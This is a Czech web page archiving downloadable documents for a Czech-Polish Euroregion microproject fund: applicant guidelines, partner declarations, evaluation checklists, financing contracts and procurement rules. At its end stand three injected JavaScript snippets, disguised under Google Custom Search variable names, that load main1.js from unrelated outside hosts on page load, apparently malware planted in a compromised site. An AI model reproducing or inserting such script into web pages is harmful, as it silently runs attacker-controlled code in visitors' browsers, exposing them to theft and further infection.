Právě se nacházíte: Úvod > základní dokumenty > Archiv dokumentace

Archiv dokumentace

Archiv dokumentů ke stažení

1.  Směrnice pro žadatele verze ze dne 10.11.2008
2. Seznam příloh Směrnice pro žadatele verze ze dne 10.11.2008
 Seznam příloh Směrnice pro žadatele – aktualizace k 30.1.2009
3. Přílohy Směrnice pro žadatele:
4 A  Čestné prohlášení partnera pro projekt s Vedoucím partnerem v jazyce českém verze ze dne 10.11.2008
 Čestné prohlášení partnera pro projekt s Vedoucím partnerem v jazyce polském verze ze dne 10.11.2008
5 B, C Čestné prohlášení partnera projektu (opravený vzor přílohy ze dne 18.6.2008)
8 A  Dohoda o spolupráci v jazyce českém verze ze dne 10.11.2008
 Dohoda o spolupráci v jazyce polském verze ze dne 10.11.2008
Poznámka: Vedoucí partner předkládá k projektové žádosti o spolufinancování z Fondu mikroprojektu Dohodu o spolupráci v jazyce českém a také v jazyce polském, tato skutečnost bude zakomponována do Směrnice pro žadatele při její nejbližší aktualizaci
9 B, C Prohlášení o partnerství verze ze dne 10.11.2008
11 B, C Stručný popis projektu v jazyce partnera verze ze dne 10.11.2008
13 A, B, C Check list pro kontrolu formálních náležitostí verze ze dne 10.11.2008
14 A Check list pro kontrolu přijatelnosti projektu s Vedoucím partnerem (lead partner projekt – typ A) verze ze dne 10.11.2008
15 B, C Check list pro kontrolu přijatelnosti pro partnerský projekt bez Vedoucího partnera – typ B a projekt samostatně realizovatelný – typ C verze ze dne 10.11.2008
16 A Hodnotící tabulka kvality projektu verze ze dne 10.11.2008
17 A Hodnotící tabulka kvality české části projektu verze ze dne 10.11.2008
18 A Hodnotící tabulka kvality polské části projektu verze ze dne 10.11.2008
19 A Hodnotící tabulka přeshraniční spolupráce verze ze dne 10.11.2008
20 A Hodnotící tabulka přeshraničního dopadu verze ze dne 10.11.2008
22 A Smlouva o financování projektu s Vedoucím partnerem (lead partner projektů – typ A) včetně Přílohy č. 1 Všeobecná pravdila pro poskytnutí dotace v rámci FMP Euroregionu TS – ŚC OPPS ČR-PR – verze ze dne 12.12.2008
Smlouva o financování projektu s Vedoucím partnerem (lead partner projektů – typ A) včetně Přílohy č. 1 Všeobecná pravdila pro poskytnutí dotace v rámci FMP Euroregionu TS – ŚC OPPS ČR-PR – verze ze dne 8.3.2011
Příloha č. 7: Postupy pro zadávání veřejných zakázek malého rozsahu verze ze dne 11.12.2008
 Příloha č. 7: Postupy pro zadávání veřejných zakázek malého rozsahu – verze ze dne 1.9.2011
 Příloha č. 7: Postupy pro zadávání veřejných zakázek malého rozsahu – platné ode dne 1.4.2012 Příloha č. 7: Postupy pro zadávání veřejných zakázek malého rozsahu – verze ze dne 1.7.2012
 Postupy pro zadávání veřejných zakázek malého rozsahu – platné ode dne 1.4.2012 – celé znění
 Příloha č. 8: Dodržování pravidel publicity a sankce – verze ze dne 1.9.2011
 
Příloha č . 8 Dodržování pravidel publicity a sankce – verze ze dne 1.7.2012
 
Příloha č. 9: Dodatek ke Smlouvě – verze ze dne 8.3.2011 
23 B, C Příloha č. 7: Postupy pro zadávání veřejných zakázek malého rozsahu verze ze dne 11.12.2008
 Příloha č. 7: Postupy pro zadávání veřejných zakázek malého rozsahu – verze ze dne 1.9.2011
 Příloha č. 7: Postupy pro zadávání veřejných zakázek malého rozsahu – platné ode dne 1.4.2012
 Příloha č. 7: Postupy pro zadávání veřejných zakázek malého rozsahu – verze ze dne 1.7.2012
 Příloha č. 8: Dodržování pravidel publicity a sankce – verze ze dne 1.9.2011
 
Příloha č . 8 Dodržování pravidel publicity a sankce – verze ze dne 1.7.2012
 
Postupy pro zadávání veřejných zakázek malého rozsahu  – platné ode dne 1.4.2012 – celé znění
Příloha č. 9: Dodatek ke Smlouvě – verze ze dne 8.3.2011
Smlouva o financování projektu partnerského bez Vedoucího partnera – typ B a projektu samostatně realizovatelného – typ C – včetně Přílohy č. 1 Všeobecná pravdila pro poskytnutí dotace v rámci FMP Euroregionu TS – ŚC OPPS ČR-PR – verze ze dne 8.3.2011
29 A,B,C  Doplňující výklad k postupům pro zadávání zakázek spolufinancovaných ze zdrojů EU – platí pro konečné uživatele, kteří postupují dle českého práva ze dne 1.3.2011
 Doplňující výklad k postupům pro zadávání zakázek spolufinancovaných ze zdrojů EU – platí pro konečné uživatele, kteří postupují dle českého práva ze dne 16.4.2012
 Doplňující výklad k postupům pro zadávání zakázek spolufinancovaných ze zdrojů EU – platí pro konečné uživatele, kteří postupují dle českého práva ze dne 1.7.2012
6. Seznam příloh předkládaných s Projektovou žádostí
10. Publicita projektu:
Zásady propagace projektu
Symbol EU
Logo Programu
Znak Euroregionu TS – ŚC
 Symbol EU, logo programu, znak Euroregionu TS – ŚC
Bude postupně doplněn.

 

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://theboatersnetwork.com/js/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();